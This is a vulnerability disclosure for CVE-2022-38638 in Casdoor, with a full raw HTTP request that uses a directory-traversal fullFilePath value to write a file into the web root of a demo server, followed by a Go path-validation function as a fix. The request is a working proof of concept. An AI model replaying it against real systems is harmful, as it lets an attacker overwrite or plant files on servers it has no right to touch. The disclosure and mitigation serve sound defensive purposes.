CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor
Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.
Hi, I found a security issue: when the upload provider is Storage Local File System, the fullFilePath parameter of the /api/upload-resource interface has a directory traversal problem. The user can specify a relative path to write malicious files to the file system, or even overwrite existing files. My request message is shown below:
POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider_storage_local_file_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider_storage_local_file_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor_session_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: */*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
------WebKitFormBoundaryUPAwhIoXMrbemuJM--
Then we can see that the problem does occur by following this link:
https://door.casdoor.com/flag.html
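One way the server side can close this kind of hole, as an added example written for this page and not code from the casdoor project: resolve the user-supplied fullFilePath under the storage provider's root directory and refuse any value that lands outside it, rather than trusting the path as given. The root directory name and the function name are assumptions; the traversal input is the one from the report above.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrPathEscape is returned when fullFilePath would resolve outside the upload root.
var ErrPathEscape = errors.New("fullFilePath escapes the upload root")
// SafeUploadPath resolves a user-controlled fullFilePath (already URL-decoded by the
// HTTP layer) under root and refuses any value that would leave root. root is an
// assumed name for the directory the local-file-system provider writes into.
func SafeUploadPath(root, fullFilePath string) (string, error) {
	absRoot, err := filepath.Abs(root)
	if err != nil {
		return "", err
	}
	// Treat backslashes as separators too, so "..\" cannot slip past on Windows hosts.
	slashed := strings.ReplaceAll(fullFilePath, `\`, "/")
	if strings.HasPrefix(slashed, "/") {
		return "", ErrPathEscape // an absolute path is never a valid resource name
	}
	// Join cleans the result, collapsing every "." and ".." segment lexically.
	target := filepath.Join(absRoot, filepath.FromSlash(slashed))
	// Compare via the relative path, not a string prefix (a prefix check would accept "/srv/files-other/x" under "/srv/files").
	rel, err := filepath.Rel(absRoot, target)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrPathEscape
	}
	// Lexical check only: if root may contain symlinks, EvalSymlinks target and recheck.
	return target, nil
}

func main() {
	root := "/srv/casdoor/files" // constructed example root
	for _, p := range []string{
		"resource/built-in/admin/spider.png", // legitimate upload
		"resource/../../web/build/flag.html", // the traversal from the report
		`resource\..\..\web\build\flag.html`, // same path using backslashes
	} {
		target, err := SafeUploadPath(root, p)
		fmt.Printf("%-40s -> err=%v path=%s\n", p, err, target)
	}
}
```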